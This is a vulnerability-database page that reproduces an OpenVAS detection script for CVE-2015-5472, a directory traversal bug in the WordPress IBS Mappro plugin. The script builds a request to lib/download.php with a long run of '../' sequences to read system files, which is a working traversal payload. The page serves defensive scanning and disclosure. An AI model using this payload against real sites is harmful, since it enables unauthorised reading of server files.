WordPress IBS Mappro Directory Traversal Vulnerability
🗓️ 20 May 2016 00:00:00Reported by Copyright (C) 2016 Greenbone AGType
openvas🔗 plugins.openvas.org👁 40 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| WordPress IBS Mappro Plugin Absolute Path Traversal Vulnerability | 17 Sep 201500:00 | – | cnvd | |
| CVE-2015-5472 | 15 Sep 201518:00 | – | cve | |
| CVE-2015-5472 | 15 Sep 201518:00 | – | cvelist | |
| EUVD-2015-5427 | 7 Oct 202500:30 | – | euvd | |
| CVE-2015-5472 | 15 Sep 201518:59 | – | nvd | |
| WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP) | 20 Nov 202000:00 | – | openvas | |
| WordPress IBS Mappro Plugin <= 0.9 - Absolute Path Traversal | 10 Jul 201500:00 | – | patchstack | |
| Path traversal | 15 Sep 201518:59 | – | prion | |
| IBS Mappro <= 0.6 - Directory Traversal | 10 Jul 201500:00 | – | wpexploit | |
| IBS Mappro <= 0.6 - Directory Traversal | 10 Jul 201500:00 | – | wpvulndb |
| Source | Link |
|---|---|
| wpvulndb | www.wpvulndb.com/vulnerabilities/8091 |
| wordpress | www.wordpress.org/plugins/ibs-mappro |
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:wordpress:wordpress";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.808201");
script_version("2025-04-15T05:54:49+0000");
script_cve_id("CVE-2015-5472");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2016-05-20 16:09:30 +0530 (Fri, 20 May 2016)");
script_tag(name:"qod_type", value:"exploit");
script_name("WordPress IBS Mappro Directory Traversal Vulnerability");
script_tag(name:"summary", value:"The WordPress plugin 'IBS Mappro' is prone to a directory traversal vulnerability.");
script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request
and check whether it is able to read arbitrary files or not");
script_tag(name:"insight", value:"The flaw exists due to an improper sanitization
of input to 'file' parameter in 'lib/download.php' file.");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers
to read arbitrary files.");
script_tag(name:"affected", value:"WordPress IBS Mappro version 0.6 and previous");
script_tag(name:"solution", value:"Update to IBS Mappro version 1.0 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"https://wpvulndb.com/vulnerabilities/8091");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2016 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_wordpress_http_detect.nasl", "os_detection.nasl");
script_mandatory_keys("wordpress/http/detected");
script_require_ports("Services/www", 80);
script_xref(name:"URL", value:"https://wordpress.org/plugins/ibs-mappro");
exit(0);
}
include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
if(!port = get_app_port(cpe:CPE, service:"www"))
exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
files = traversal_files();
foreach file (keys(files)) {
url = dir + '/wp-content/plugins/ibs-mappro/lib/download.php?file=' + crap(data: "../", length: 3*15) + files[file];
if(http_vuln_check(port:port, url:url, check_header:TRUE, pattern:file)) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 27.8
EPSS0.03263